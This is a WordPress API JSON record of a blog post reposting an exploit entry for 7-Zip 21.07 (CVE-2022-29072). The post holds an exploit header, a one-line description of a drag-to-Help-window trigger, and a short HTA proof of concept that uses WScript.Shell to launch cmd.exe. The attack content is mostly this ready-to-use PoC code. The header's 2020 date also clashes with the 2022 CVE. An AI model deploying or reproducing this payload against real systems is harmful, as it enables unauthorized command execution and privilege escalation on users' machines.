{"id":23384,"date":"2022-04-19T19:29:55","date_gmt":"2022-04-19T15:29:55","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166763\/7zip-escalate.txt"},"modified":"2022-05-09T07:50:39","modified_gmt":"2022-05-09T03:20:39","slug":"7-zip-21-07-code-execution-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/7-zip-21-07-code-execution-privilege-escalation\/","title":{"rendered":"7-Zip 21.07 Code Execution \/ Privilege Escalation"},"content":{"rendered":"<pre dir=\"ltr\"><code># Exploit Title: 7-zip - Code Execution \/ Local Privilege Escalation\r\n# Exploit Author: Kagan Capar\r\n# Date: 2020-04-12\r\n# Vendor homepage: https:\/\/www.7-zip.org\/\r\n# Software link: https:\/\/www.7-zip.org\/a\/7z2107-x64.msi\r\n# Version: 21.07 and all versions\r\n# Tested On: Windows 10 Pro (x64)\r\n# References: https:\/\/github.com\/kagancapar\/CVE-2022-29072<\/code><\/pre>\n<p dir=\"ltr\"># About:<br \/>\n7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help&gt;Contents area.<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Proof of Concept:<br \/>\n&lt;html&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;HTA:APPLICATION ID=&#8221;7zipcodeexec&#8221;&gt;<br \/>\n&lt;script language=&#8221;jscript&#8221;&gt;<br \/>\nvar c = &#8220;cmd.exe&#8221;;<br \/>\nnew ActiveXObject(&#8216;WScript.Shell&#8217;).Run(c);<br \/>\n&lt;\/script&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;html&gt;<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\">\n<pre dir=\"ltr\"><code><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: 7-zip &#8211; Code Execution \/ Local Privilege Escalation # Exploit Author: Kagan Capar # Date: 2020-04-12 # Vendor homepage: https:\/\/www.7-zip.org\/ # Software link: https:\/\/www.7-zip.org\/a\/7z2107-x64.msi # Version: 21.07 and all versions # Tested On: Windows 10 Pro (x64) # References: https:\/\/github.com\/kagancapar\/CVE-2022-29072 # About: 7-Zip through 21.07 on Windows allows privilege escalation and command &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-23384","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23384","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=23384"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/23384\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=23384"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=23384"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=23384"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}